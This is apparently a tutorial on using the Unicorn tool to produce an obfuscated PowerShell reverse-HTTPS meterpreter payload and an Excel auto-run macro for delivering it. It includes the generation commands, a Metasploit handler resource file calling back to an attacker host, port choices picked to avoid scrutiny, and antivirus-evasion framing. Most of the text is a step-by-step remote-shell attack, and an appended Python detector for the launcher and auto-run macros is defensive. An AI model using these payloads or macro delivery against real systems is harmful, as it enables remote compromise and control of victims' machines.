
In this tutorial I show how to inject shellcode into memory using Unicorn. Unicorn is a package created by Dave Kennedy, www.trustedsec.com.

Attack Plan

We set a reverse HTTPS payload. There are pros and cons to the reverse-HTTPS shell; for comparison, take a look at using a reverse-TCP shell. Upon executing it, a meterpreter session will be opened, and from there all the capabilities of a meterpreter session are at our fingertips. HTTPS means the connection is SSL encrypted, an added bonus of this payload type. However, many networks intercept and decode SSL encrypted traffic. What does that mean for our plan? Even if the traffic carrying our exploit is decrypted, Unicorn leverages not just one but two types of encoding built into Kali: the “shikata ga nai” and the x86/bloxor (Windows 32-bit) encoders.

As I’ve covered before, using a reverse shell is an ethical hacking standard. The way it works is that the victim machine calls back to the attacking machine. Few firewalls block outbound port 80 or port 8080 traffic, so it is an ideal route to connect by. We are going to choose port 8080. This port is a lot less obvious than traffic going over 443, and the same goes for port 80. The cat is out of the bag there, because everyone knows 443 traffic is something to investigate, and that scrutiny is naturally something you do not want.

Delivery Methods covered in this tutorial:

  • PowerShell commands
  • VBS Macro

Here’s What You Need

You need these things to follow this tutorial; if you need help, see this quick and easy guide I have already made.

  • Kali Linux Instance (VirtualBox)
  • Windows 10 Instance (VirtualBox)
  • Custom Virtual Network (VirtualBox)
  • Unicorn package, get it here.

PowerShell Delivery

PowerShell is fantastic, just not to look at, or even to use really. What’s so good about PowerShell then? It’s Windows native; in other words, it is already installed on every Windows machine. If you do a lot of reading into ethical hacking methodologies you will recognize this as a prime example of “living off the land”: why take the time and risk to download third-party programs to exploit a victim host when the tools already on it can be used? Let’s get started.

# download or git clone the repository into your root dir
root@kali:~ unzip unicorn-master.zip

# generate the payload
root@kali:~/unicorn-master python unicorn.py windows/meterpreter/reverse_https 10.0.0.2 8080

Running the command above created two files. The first is powershell_attack.txt and the second is unicorn.rc.

# take a look at the powershell payload text
root@kali:~/unicorn-master cat powershell_attack.txt

powershell /w 1 /C "s''v Yi -;s''v ijX e''c;s''v Ly ((g''v Yi).value.toString()+(g''v ijX).value.toString());powershell (g''v Ly).value.toString() ('JABY ....more encoded strings')"

Looking at the contents of the unicorn.rc file we see lines of what look like Metasploit commands. “set ExitOnSession false” keeps the handler listening after a session is opened, so every payload delivered opens a new, separate session: a new meterpreter session for every new connection.

# take a look at the second file, unicorn.rc
root@kali:~/unicorn-master cat unicorn.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 10.0.0.2
set LPORT 8080
set ExitOnSession false
set EnableStageEncoding true
exploit -j

The file unicorn.rc is a c/c++ style resource file. It is used in this scenario to automate some of the commands for Metasploit to execute. Think of this file as similar to a bash script: running it is the same as if you were already in msfconsole typing each command yourself, for example running msf > set LHOST <ip address> manually.

# run the resource file as documented
root@kali:~/unicorn-master msfconsole -r unicorn.rc

Running the resource file initiates all the commands, seen below.

[Image: inject shellcode into memory using unicorn]

Test the Reverse HTTPS Connection

It is always a good idea to make sure a connection to the host is possible. This can be done with an ICMP request, confirmed by a reply, and also by opening a web browser and entering the IP address of the Kali Linux machine, in this format: <kali-ip-address>:8080.

Now we are sure the connection works. The next obstacle is creating a persistent shell to the target. What we have done is merely test that the Metasploit console’s listener, the multi/handler, can capture the attack. In order to initiate an active meterpreter session, you need to execute the payload on the victim machine. Remember the payload is in powershell_attack.txt.

Execute Payload On Victim

Once the code found in powershell_attack.txt is executed on the victim, a meterpreter session is opened in msfconsole.

Now to see the open session(s).

# list sessions
msf exploit(multi/handler) > sessions -l

# open a session prompt
msf exploit(multi/handler) > sessions 1

VBA Macro Delivery

Using Unicorn to generate a macro is simple. Printing the help instructions, we see a clear example: “Macro Example: python unicorn.py windows/meterpreter/reverse_https 192.168.1.5 443 macro”.

# macro time
root@kali:~/unicorn-master python unicorn.py windows/meterpreter/reverse_https 10.0.0.2 8080 macro

Open an Excel document and hit Alt+F11. Create a new macro by navigating to Tools > Macros. Name the new macro “Auto_Open” and click Create. Now paste the contents of powershell_attack.txt into the new macro and save. IMPORTANT: if the version of Microsoft Office is later than 2016, save the macro as AutoOpen. The first line of the macro should say “Dim AutoOpen()”; check this to make sure. Save the document as a macro-enabled document type.

Per Unicorn help instructions, Office versions 2016+ should use AutoOpen(). Older versions are fine with Auto_Open().

# start the listener
root@kali:~/unicorn-master msfconsole -r unicorn.rc

The final step is to open the document on the victim machine. Doing so opens a meterpreter session. In conclusion, that is how to use Unicorn to execute shellcode in memory to evade antivirus detection.
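For the defensive side of both delivery methods above, the PowerShell launcher in powershell_attack.txt and the Auto_Open/AutoOpen macro, here is an added triage example (my own code, not part of this tutorial or of Unicorn) that scans a command line or VBA source for the launcher's tell-tale traits: the quote-split aliases (s''v, g''v), the hidden window switch, the nested powershell call, the long base64 blob, and an auto-executing macro sub. The sample inputs are constructed to have the same shape as the output shown above; they carry no real payload.

```python
import re

# Constructed samples (not real payloads), shaped like the launcher Unicorn writes to
# powershell_attack.txt and like that launcher wrapped in the macro option's auto-run sub.
LAUNCHER = (
    "powershell /w 1 /C \"s''v Yi -;s''v ijX e''c;"
    "s''v Ly ((g''v Yi).value.toString()+(g''v ijX).value.toString());"
    "powershell (g''v Ly).value.toString() ('JAB" + "A" * 100 + "')\""
)
MACRO = ("Sub AutoOpen()\nDim x\nx = \"" + LAUNCHER.replace('"', '" & Chr(34) & "')
         + "\"\nShell (x)\nEnd Sub\n")
BENIGN = "powershell -NoProfile -Command \"Get-Process | Sort-Object CPU -Descending\""
BENIGN_VBA = "Sub Workbook_Open()\nMsgBox \"hello\"\nEnd Sub\n"

INDICATORS = {
    # s''v / g''v / e''c: an identifier split by an empty string to defeat keyword matching
    "quote_split_token": re.compile(r"\w(?:''|\"\")\w"),
    # /w 1, -w hidden, -WindowStyle Hidden: the console window is kept invisible
    "hidden_window": re.compile(r"(?:/w\s+1|-w(?:indowstyle)?\s+h(?:idden)?)\b", re.I),
    # powershell starting a second powershell once the real switch has been assembled
    "nested_powershell": re.compile(r"powershell\b.*powershell\b", re.I | re.S),
    # a long base64 run; 'JAB' is how base64 of UTF-16LE text starting with '$' begins
    "long_base64_blob": re.compile(r"JAB[A-Za-z0-9+/]{80,}={0,2}"),
    # VBA subs that Office runs by itself when the document is opened
    "autoexec_sub": re.compile(r"\bSub\s+(?:Auto_?Open|Document_Open|Workbook_Open)\s*\(", re.I),
}

def normalize(text):
    """Undo the quote-split trick (s''v -> sv) so the alias names become visible."""
    return re.sub(r"(?<=\w)(?:''|\"\")(?=\w)", "", text)

def scan(text):
    """Return the set of indicator names that fire on a command line or VBA source."""
    hits = {name for name, rx in INDICATORS.items() if rx.search(text)}
    # Normalized, the launcher reads 'sv Yi -;sv ijX ec;...': sv/gv are the
    # Set-Variable/Get-Variable aliases used to build the '-ec' switch at run time.
    if re.search(r"\bsv\s+\w+\s+-\s*;", normalize(text), re.I):
        hits.add("assembles_ec_switch")
    return hits

def verdict(text):
    """Coarse triage: several indicators together are far stronger than any one alone."""
    hits = scan(text)
    return ("suspicious" if len(hits) >= 3 else "review" if hits else "clean"), hits

if __name__ == "__main__":
    for label, sample in [("launcher", LAUNCHER), ("macro", MACRO),
                          ("benign", BENIGN), ("benign_vba", BENIGN_VBA)]:
        print(label, *verdict(sample))
```

The same checks apply to process-creation logs (the command line field) and to VBA extracted from a document; an auto-run sub on its own only rates "review", since plenty of legitimate workbooks use Workbook_Open.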
